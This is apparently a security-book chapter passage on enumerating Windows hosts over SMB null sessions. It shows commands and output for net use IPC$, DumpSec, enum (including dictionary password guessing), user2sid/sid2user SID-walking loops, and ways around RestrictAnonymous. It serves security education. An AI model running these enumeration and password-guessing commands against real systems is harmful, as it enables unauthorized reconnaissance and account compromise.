Popularity: 5
Simplicity: 7
Impact: 3
Risk Rating: 5
One of Windows’ most serious Achilles’ heels has traditionally been its default reliance on the Common Internet File System/Server Message Block (CIFS/SMB;
hereafter, just SMB) networking protocols. The SMB specs include APIs that return rich information about a machine via TCP ports 139 and 445, even to unauthenticated users.
The first step in accessing these APIs remotely is creating just such an unauthenticated connection to a Windows system by using the so-called “null session” command, assuming TCP port 139 or 445 is shown listening by a previous port scan:
C:\>net use \\192.168.202.33\IPC$ "" /u:""
The command completed successfully.
This syntax connects to the hidden interprocess communications “share” (IPC$) at IP address 192.168.202.33 as the built-in anonymous user (/u: "") with a null ("") password.
If successful, the attacker now has an open channel over which to attempt all the various techniques outlined in the rest of this section to pillage as much information as possible from the target: network information, shares, users, groups, Registry keys, and so on.
Almost all the information-gathering techniques described in this section on host enumeration take advantage of this single out-of-the-box security failing of Windows.
Whether you’ve heard it called the “Red Button” vulnerability, null session connections, or anonymous logon, it can be the single most devastating network foothold sought by intruders.
Microsoft has made some progress against disabling null sessions in default client configurations:
Windows client products including XP and later block null sessions out of the box. Null sessions are still available by default on Windows Server products (including Server 2003 and 2008 as of Build 1715); however, access to sensitive information is blocked by default security policy configuration (some information is available if the machine is configured as a domain controller). Next we discuss the various attacks that can be performed over null sessions against a Windows Server 2003 domain controller (these attacks are blocked by default in Server 2008).
Enumerating Shares With a null session established, we can also fall back on good ol’ net view to enumerate shares on remote systems:
C:\>net view \\vito
Shared resources at \\192.168.7.45
VITO
Share name Type Used as Comment
---NETLOGON Disk Logon server share
Test Disk Public access Finance Disk Transaction records Web Disk Webroot for acme.com The command completed successfully.
Three other good share-enumeration tools from the Resource Kit are rmtshare, srvcheck, and srvinfo (using the –s switch). Rmtshare generates output similar to net view. Srvcheck displays shares and authorized users, including hidden shares, but it requires privileged access to the remote system to enumerate users and hidden shares.
Srvinfo’s –s parameter lists shares along with a lot of other potentially revealing information.
Enumerating Trusted Domains Once a null session is set up to one of the machines in the enumerated domain, the nltest /server:<server_name> /domain_trusts syntax can be used to learn about other Windows domains with trust relationships to the first. This information will come in handy when we discuss Local Security Authority (LSA) secrets in Chapter 7.
Enumerating Users In the good ol’ days of hacking, Windows machines would cough up account information just about as easily as they revealed shares. Some key changes to the default configuration around null session access in Windows XP and later have put a stop to all that. For this reason, the following examples were run against a Windows Server 2003 domain controller—this command would be denied against a default stand-alone or member server configuration.
A few Resource Kit tools can provide more information about users via null sessions, such as the usrstat, showgrps, local, and global utilities. We typically use the local utility to dump the members of the local Administrators group on a target server:
C:\>local administrators \\caesars Administrator
Enterprise Admins Domain Admins backadmin
Note that the RID 500 account is always listed first in this output and that additional administrative accounts (such as backadmin) are listed after groups.
The global tool can be used in the same way to find the members of the Domain Admins:
C:\>global "domain admins" \\caesars Administrator
backadmin
In the next section, we discuss some all-in-one enumeration tools that also do a great job of enumerating users, in addition to shares, trusts, and other tantalizing information.
All-in-One SMB Enumeration Tools The tools we’ve shown you so far are all single-purposed.
In the following paragraphs, we introduce some all-purpose enumeration tools that perform all of the SMB enumeration techniques we’ve seen so far—and then some!
One of the best tools for enumerating Windows systems is DumpSec (formerly DumpACL) from SomarSoft. Few tools deserve their place in the Windows security auditor’s toolbox more than DumpSec. It audits everything from file system permissions to services available on remote systems. DumpSec has an easy-to-use graphical interface, or it can be run from the command line, making for easy automation and scripting.
To use DumpSec anonymously, first set up a null session to a remote system. Then, in DumpSec, choose Report | Select Computer and type in the name of the remote system.
(Make sure to use the exact name you used to create the null session, or you will get an error.) Then select whatever report you want to run from the Reports menu. Figure 4-2 shows DumpSec being used to dump share information from a remote computer by choosing Report | Dump Permissions For Shares. Note that this displays both hidden and non-hidden shares.
Dumping shares over a null session is still possible by default on Windows Server 2003. DumpSec can also dump user account information, but only if the target system has been configured to permit release of such information over a null session (some might say misconfigured). Windows Server 2003 domain controllers will permit this activity by default, so the following examples were run against that target. In this example, we use DumpSec from the command line to generate a file containing user
Figure 4-2 DumpSec reveals all shares over a null session.
information from the remote computer (remember that DumpSec requires a null session with the target computer to operate):
C:\>dumpsec /computer=\\caesars /rpt=usersonly /saveas=tsv /outfile=c:\temp\users.txt C:\>cat c:\temp\users.txt
5/26/2003 3:39 PM - Somarsoft DumpSec (formerly DumpAcl) - \\caesars UserName FullName Comment
Administrator
Built-in account for administering the computer/domain backadmin backadmin
Guest
Built-in account for guest access to the computer/domain IUSR_CAESARS
Internet Guest Account Built-in account for anonymous access to Internet Information Services
IWAM_CAESARS Launch IIS Process Account Built-in account for Internet
Information Services to start out of process applications krbtgt Key Distribution Center Service Account
SUPPORT_388945a0 CN=Microsoft Corporation,L=Redmond,S=Washington,C=US This is a vendor's account for the Help and Support Service
Using the DumpSec GUI, many more information fields can be included in the report, but the format shown here usually ferrets out troublemakers. For example, we once came across a server that stored the password for the renamed Administrator account in the FullName field!
DumpSec is also capable of gathering policies, user rights, and services over a null session, but these items are restricted by default on Windows.
It took the RAZOR team from BindView to throw just about every SMB enumeration feature into one tool, and then some. They called it enum—fittingly enough for this chapter. The following listing of the available command-line switches for this tool demonstrates how comprehensive it is.
C:\>enum
usage: enum [switches] [hostname|ip]
-U: get userlist -M: get machine list
-N: get namelist dump (different from -U|-M) -S: get sharelist
-P: get password policy information -G: get group and member list -L: get LSA policy information
-D: dictionary crack, needs -u and -f -d: be detailed, applies to -U and -S -c: don't cancel sessions
-u: specify username to use (default "") -p: specify password to use (default "") -f: specify dictfile to use (wants -D)
Enum even automates the setup and teardown of null sessions. Of particular note is the password policy enumeration switch, -P, which tells remote attackers whether they can remotely guess user account passwords (using –D, -u, and –f) until they find a weak one. The following example has been edited for brevity to show enum in action against a Windows Server 2003 domain controller:
C:\>enum -U -d -P -L -c caesars lockout duration: 30 mins lockout reset: 30 mins opening lsa policy... success.
paged pool limit: 33554432 non paged pool limit: 1048576 min work set size: 65536 max work set size: 251658240 pagefile limit: 0
time limit: 458672 trusted domains:
indeterminate
netlogon done by a PDC server
getting user list (pass 1, index 0)... success, got 7.
Administrator (Built-in account for administering the computer/do-main)
attributes:
backadmin attributes: disabled
Guest (Built-in account for guest access to the computer/domain) attributes: disabled no_passwd
IUSR_CAESARS
(Built-in account for anonymous access to Internet Information Services)
attributes: no_passwd IWAM_CAESARS
(Built-in account for Internet Information Services to start out of process applications)
attributes: no_passwd
krbtgt (Key Distribution Center Service Account) attributes: disabled
SUPPORT_388945a0 (This is a vendor's account for the Help and Support Service)
attributes: disabled
Enum will also perform remote password guessing one user at a time using the –D –u <username> -f <dictfile> arguments.
Another great enumeration tool written by Sir Dystic, called nete (NetE), will extract a wealth of information from a null session connection. We like to use the /0 switch to perform all checks, but here’s the command syntax for nete to give some idea of the comprehensive information it can retrieve via null session:
C:\>nete
NetE v.96 Questions, comments, etc. to [email protected]
Usage: NetE [Options] \\MachinenameOrIP Options:
/0 - All NULL session operations /A - All operations
/Q - Platform specific info /P - Printer ports and info
/Y - Remote registry trees /Z - Trusted domains
Bypassing RestrictAnonymous Following the release of NT 4 Service Pack 3, Microsoft attempted to defend against the null session enumeration vulnerability by creating the RestrictAnonymous configuration option (see the upcoming “SMB Enumeration Countermeasures” section). However, some enumeration tools and techniques will still extract sensitive data from remote systems, even if RestrictAnonymous is configured to restrict it. We’ll discuss some of these tools next.
Two extremely powerful Windows enumeration tools are sid2user and user2sid by Evgenii Rudnyi. They are command-line tools that look up Windows SIDs from username input and vice versa. (SIDs are introduced and described in Chapter 2.) To use them remotely requires null session access to the target machine. The following techniques will work against out-of-the-box Windows Server 2003 and Server 2008 domain controllers (since the policy Allow Anonymous SID/Name Translation is enabled by default).
First, we extract a domain SID using user2sid:
C:\>user2sid \\192.168.202.33 "domain users"
S-1-5-21-8915387-1645822062-1819828000-513
Number of subauthorities is 5 Domain is WINDOWSNT
Length of SID in memory is 28 bytes Type of SID is SidTypeGroup
This tells us the SID for the machine—the string of numbers that begins with S-1 separated by hyphens in the first line of output.
As we saw in Chapter 2, the numeric string following the last hyphen is called the relative identifier (RID), and it is predefined for built-in Windows users and groups such as Administrator or Guest. For example, the Administrator user’s RID is always 500, and the Guest user’s RID is 501. Armed with this tidbit, a hacker can use sid2user and the known SID string appended with a RID of 500 to find the name of the Administrator’s account (even if it’s been renamed):
C:\>sid2user \\192.168.2.33 5 21 8915387 1645822062 18198280005 500
Name is godzilla Domain is WINDOWSNT
Type of SID is SidTypeUser
Note that the S-1 and hyphens are omitted. Another interesting factoid is that the first account created on any Windows NT–family local system or domain is assigned an RID of 1000, and each subsequent object gets the next sequential number after that (1001, 1002, 1003, and so on—RIDs are not reused on the current installation). Thus, once the SID is known, a hacker can basically enumerate every user and group on an NT/2000 system, past and present.
Here’s a simple example of how to script user2sid/sid2user to loop through all of the available user accounts on a system. Before running this script, we first determine the SID for the target system using user2sid over a null session, as shown previously.
Recalling that NT/2000 assigns new accounts an RID beginning with 1000, we then execute the following loop using the NT/2000 shell command FOR and the sid2user tool (see earlier) to enumerate up to 50 accounts on a target:
C:\>for /L %i IN (1000,1,1050) DO sid2user \\acmepdc1 5 21 1915163094 1258472701648912389 %I >> users.txt
C:\>cat users.txt
Name is IUSR_ACMEPDC1 Domain is ACME
Type of SID is SidTypeUser
Name is MTS Trusted Impersonators Domain is ACME
Type of SID is SidTypeAlias . . .
This raw output could be sanitized by piping it through a filter to leave just a list of usernames. Of course, the scripting environment is not limited to the NT shell—Perl, VBScript, or whatever is handy will do. As one last reminder before we move on, realize that this example will successfully dump users as long as TCP port 139 or 445 is open on the target, even if RestrictAnonymous is configured to the moderately conservative setting of “1” (again, see the upcoming “SMB Enumeration Countermeasures” section for explicit RestrictAnonymous values and their meaning).
The UserDump tool, discussed shortly, automates this “SID walking” enumeration technique.
Configure the Security Policy setting Network Access: Allow Anonymous SID/Name Translation to Disabled in Windows XP and later to prevent this attack.
The UserInfo tool from Tim Mullen ([email protected]) will enumerate user information over a null session even if RestrictAnonymous is set to 1. By querying NetUserGetInfo API call at Level 3, UserInfo accesses the same sensitive information as other tools like DumpSec that are stymied by RestrictAnonymous = 1. Here’s UserInfo enumerating the Administrator account on a remote system with RestrictAnonymous = 1:
C:\>userinfo \\victim.com Administrator
UserInfo v1.5 - [email protected]
Querying Controller \\mgmgrand
A related tool from Tim Mullen is UserDump. It enumerates the remote system SID and then “walks” expected RID values to gather all user account names. UserDump takes the name of a known user or group and iterates a user-specified number of times through SIDs 1001 and up. UserDump will always get RID 500 (Administrator) first, and it then begins at RID 1001 plus the maximum number of queries specified. (A MaxQueries setting of 0 or blank returns SID 500 and 1001.) Here’s a sample of UserDump in action against a Windows Server 2003 domain controller:
C:\>userdump \\mgmgrand guest 10
UserDump v1.11 - [email protected]
Querying Controller \\mgmgrand
USER INFO
Username: Administrator Full Name:
Comment: Built-in account for administering the computer/domain User Comment:
User ID: 500 Primary Grp: 513
Privs: Admin Privs
OperatorPrivs: No explicit OP Privs [snip]
LookupAccountSid failed: 1007 does not exist...
LookupAccountSid failed: 1008 does not exist...
LookupAccountSid failed: 1009 does not exist...
Get hammered at HammerofGod.Com!
Another tool called GetAcct by Urity performs this same SID walking technique.
GetAcct has a graphical interface and can export results to a comma-separated file for later analysis. It does not require the presence of an Administrator or Guest account on the target server. GetAcct is shown in Figure 4-3, obtaining user account information from a system with RestrictAnonymous = 1.
Walksam, one of three RPCTools from Todd Sabin, also walks the Security Accounts Manager (SAM) database and dumps out information about each user found. It supports both the “traditional” method of doing this via named pipes and the additional mechanisms that are used by Windows domain controllers. It can bypass
RestrictAnonymous = 1 if null sessions are feasible. Here’s an abbreviated example of walksam in action (note that a null session already exists with the target server):
C:\rpctools>walksam 192.168.234.44 rid 500: user Administrator
Userid: Administrator Full Name:
Home Dir:
Home Drive:
Logon Script:
Profile:
Description: Built-in account for administering the computer/domain Workstations:
Profile:
User Comment:
Last Logon: 7/21/2001 5:39:58.975 Last Logoff: never
Last Passwd Change: 12/3/2000 5:11:14.655 Acct. Expires: never
Figure 4-3 GetAcct walks SIDs via null session, bypassing RestrictAnonymous = 1.
Allowed Passwd Change: 12/3/2000 5:11:14.655 Rid: 500
Primary Group Rid: 513 Flags: 0x210
Fields Present: 0xffffff Bad Password Count: 0 Num Logons: 88
rid 501: user Guest Userid: Guest [etc.]
We hope you enjoyed this little stroll down memory lane. Next, we’re going to discuss some major improvements to Windows XP and later that essentially eliminate the need to worry about RestrictAnonymous.